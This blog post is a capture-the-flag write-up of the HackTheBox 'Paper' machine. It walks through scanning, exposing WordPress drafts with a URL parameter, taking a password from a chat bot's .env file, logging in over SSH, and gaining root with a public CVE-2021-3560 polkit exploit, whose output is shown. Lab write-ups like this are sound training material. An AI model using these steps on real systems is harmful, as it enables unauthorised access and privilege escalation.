Written by

Share this post!


← ../

HackTheBox Paper Writeup

February 08, 20221 min read


This challenge was incredibly simple yet fun to play around in. There were hints across each step along the way, however it took time to notice and trial and error.

Let's get started!




└──╼ #nmap -sC -sV -sS -A -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-11 22:28 EST
Nmap scan report for
Host is up (0.028s latency).
Not shown: 65532 closed tcp ports (reset)
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops

TRACEROUTE (using port 995/tcp)
1   27.30 ms
2   27.30 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.24 seconds


└──╼ #gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -b "404"
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Excluded Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/02/11 22:33:42 Starting gobuster in fuzzing mode
Found: [Status=301] [Length=235]
Progress: 66278 / 220561 (30.05%)                         ^C
[!] Keyboard interrupt detected, terminating.
2022/02/11 22:36:44 Finished

Though I didn't finish gobuster til completion, there was no more progress to be made so I cut it short to not waste time. It is a safer practice to let it go til completion.


└──╼ $nikto -host
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2022-02-11 23:03:11 (GMT-5)
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

Uncommon header 'x-backend-server' found, with contents: office.paper

This is our vector. In order to accomodate for the backend-server, we need to modify our own /etc/hosts file to add office.paper associated to our ip.

# Host addresses  localhost  zyphen
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters office.paper


After scanning through the new webpage, we notice an odd comment with one of the posts.

In the Feeling Alone! post, Nick tells Michael not to leave anything in the drafts.

This means there is likely an exploit related to viewing drafts in wordpress.


By attaching ?static=1 to the base url, we may now see all drafts on the webpage


There is a link to a chat room... Which I have blurred out.


We can now create an account on the chat page and start more reconnaissance.


In the general chat, after scrolling up a bit, we should see a post made by this bot. With the knowledge of its commands in chat, we can now dm the bot our commands.

Something I noticed in particular was the .env in hubot's folder. It contained a login with username and password, but this could also be Dwight's own password.



We can ssh as dwight using the password given and we now have access to the user hash.

└──╼ #ssh [email protected]
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:2eiFA8VFQOZukubwDkd24z/kfLkdKlz4wkAa/lRN3Lg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Fri Feb 11 23:26:34 2022 from
[[email protected] ~]$ ls
bot_restart.sh  hubot  sales  user.txt
[[email protected] ~]$ cat user.txt 

Privilage Escalation


Linpeas is a software used to find vulnerabilities in a system. This can be run using low level permissions, but gives a detailed account on each topic.

Generally for privesc, we want to look at possibilities of sudo.

Under the topic Sudo version, it states it is vulnerable to CVE-2021-3560.


Using python3 to run this script, we now have access to root.

[[email protected] ~]$ python3 exp.py 
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
[+] Starting the Exploit 
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
[+] User Created with the name of ahmed
[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

bash: cannot set terminal process group (11001): Inappropriate ioctl for device
bash: no job control in this shell
[[email protected] dwight]# su ahmed
bash: cannot set terminal process group (11001): Inappropriate ioctl for device
bash: no job control in this shell
[[email protected] dwight]$ sudo su
bash: cannot set terminal process group (11001): Inappropriate ioctl for device
bash: no job control in this shell
[[email protected] dwight]# ls
bot_restart.sh  exp.py  hubot  linpeas.sh  sales  user.txt
[[email protected] dwight]# cd /root/
[[email protected] ~]# ls
anaconda-ks.cfg  initial-setup-ks.cfg  root.txt
[[email protected] ~]# cat root.txt 

We are done!

Published February 08, 2022, by ZyphenSVC.

If you enjoyed the post, consider sharing it!


Copyright © 2023 Sriaditya Vedantam. Site source on GitHub.